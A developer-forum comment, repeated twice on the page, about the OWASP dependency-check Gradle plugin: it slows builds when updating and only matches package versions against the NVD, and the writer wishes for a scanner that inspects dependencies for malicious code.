I use the Gradle plugin of the OWASP dependency checker as part of the build process of a Java web application project. It works fine, but it can drastically slow down the build process when it downloads the latest exploit database updates. Nice to see that they also added support for Node.JS.
The biggest problem with it (and perhaps also snyk.io?) is that it doesn't perform any code analysis for unreported problems and malicious code. It appears it only checks package names and version numbers against the NVD database of known security vulnerabilities.
I wish there was something like a malware scanner out there for going through all dependencies and looking for red flags (e.g. code obfuscation, certain URLs, HTTP requests where there shouldn't be any etc.). I would even take the occasional false positive into account just to make sure no one mines bitcoins on my server or steals credit card data :-/
For further actions, you may consider blocking this person and/or reporting abuse
We're a place where coders share, stay up-to-date and grow their careers.
I use the Gradle plugin of the OWASP dependency checker as part of the build process of a Java web application project. It works fine, but it can drastically slow down the build process when it downloads the latest exploit database updates. Nice to see that they also added support for Node.JS.
The biggest problem with it (and perhaps also snyk.io?) is that it doesn't perform any code analysis for unreported problems and malicious code. It appears it only checks package names and version numbers against the NVD database of known security vulnerabilities.
I wish there was something like a malware scanner out there for going through all dependencies and looking for red flags (e.g. code obfuscation, certain URLs, HTTP requests where there shouldn't be any etc.). I would even take the occasional false positive into account just to make sure no one mines bitcoins on my server or steals credit card data :-/